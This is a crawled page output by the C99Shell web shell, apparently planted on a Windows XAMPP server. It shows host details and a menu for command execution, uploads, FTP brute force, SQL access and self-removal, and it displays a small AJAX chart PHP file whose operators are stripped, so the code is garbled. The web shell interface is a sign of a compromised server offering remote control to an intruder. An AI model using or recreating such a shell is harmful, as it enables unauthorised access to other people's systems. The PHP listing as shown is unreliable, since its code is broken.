!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\phpold\AjaxPhpCode\Chapter07\ajax\svg_chart\   drwxrwxrwx
Free 7.26 GB of 239.26 GB (3.03%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     svg_chart_bun.php (743 B)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
// variable initialization
$maxX 50// our max X
$maxY 100//our max Y
$maxVariation $maxY 5;
// client tells last X value generated (defaults to -1)
if (isset($_GET['lastX']))
  
$lastX $_GET['lastX'];
else
  
$lastX = -1;
// client tells last Y value generated (defaults to random)
if (isset($_GET['lastY']))
  
$lastY $_GET['lastY'];
else
  
$lastY rand(0$maxY);
// calculate a new random number
$randomY $lastY $maxVariation rand(0$maxVariation*2);
// make sure the new Y is between 0 and $maxY
while ($randomY 0$randomY += $maxVariation;
while (
$randomY $maxY$randomY -= $maxVariation;
// generate a new pair of numbers
$output $lastX ',' $randomY;
echo 
$output;
?>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--